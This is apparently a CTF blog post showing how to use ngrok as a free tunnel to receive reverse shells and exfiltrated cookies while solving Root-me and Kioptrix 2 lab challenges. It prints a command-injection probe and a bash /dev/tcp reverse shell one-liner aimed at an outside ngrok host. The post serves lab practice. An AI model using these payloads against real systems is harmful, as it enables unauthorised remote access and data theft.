I think many of us do CTFs, but also many of us don’t have any money, because we’re student or addict to drugs. So when you don’t have any money, you get creative.
For webguys who are looking for a reverse shell or who want admin cookies on a remote host (hello root-me), but don’t want to pay for a VPS, there is a free solution. Ngrok.
How it works?
Rather than making a super long and incomprehensible paragraph, here is a small diagram coming directly from the ngrok site:
So for our needs we will make a tcp tunnel between our port listening with netcat and ngrok. To listen on the internet and wait for remote data:
Now, let’s move on to practice.
All those step are explained on the ngrok website. But first, you need to create an account, it will have a unique identifier. You can put garbage:
- Username: bitedepoulet
- Email address: firstname.lastname@example.org
- Password: ***********
And then download the right archive, for me it’s
Unzip the archive, past the ngrok line with your private authtoken and we can start.
▶ unzip ngrok-stable-linux-amd64.zip Archive: ngrok-stable-linux-amd64.zip inflating: ngrok ▶ ./ngrok authtoken ENTERYOUROWN Authtoken saved to configuration file: /home/maki/.ngrok2/ngrok.yml ▶ ./ngrok help NAME: ngrok - tunnel local ports to public URLs and inspect traffic DESCRIPTION: ngrok exposes local networked services behinds NATs and firewalls to the [...]
It’s successfully installed.
Ok, so I start a boot2root machine on
root-me.org: kioptrix 2 (download link + WU in resource section).
Here is the RCE:
Now, let’s check which command are available for a reverse shell:
; which nc python python2 python3 perl ruby php bash
You can find lot of amazing payload on: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We will use
bash command with the following payload:
bash -i >& /dev/tcp/NGROK_IP/NGROK_PORT 0>&1
- NGROK_IP: Is the ngrok remote host with a domain like “0.tcp.ngrok.io”.
- NGROK_PORT: The forwarding port associate to the ngrok remote host.
netcat for my port listening, but you can use
python3 -m http.server 31337 to catch GET data with a real web server for example.
This little trick allowed me to solve a lot of challenges without having a VPS. I hope you enjoyed this little blogpost :)
Feel free to ask me what you want on twitter @maki_chaz.
Happy hacking guys :D
- Root-me, Une plateforme rapide, accessible et réaliste pour tester vos compétences en hacking., Root-me official website: https://www.root-me.org/
- Ngrok team, What is ngrok?, Official ngrok blog: https://ngrok.com/product
- Vulnhub, Kioptrix: Level 1.1 (#2), Vulnhub team: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
- Abatchy, Kioptrix 2 Walktrhough (Vulnhub), abatchy’s blog: https://www.abatchy.com/2016/12/kioptrix-2-walkthrough-vulnhub.html
- pentestmonkey, Reverse Shell Cheat Sheet, pentestmonkey blog: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet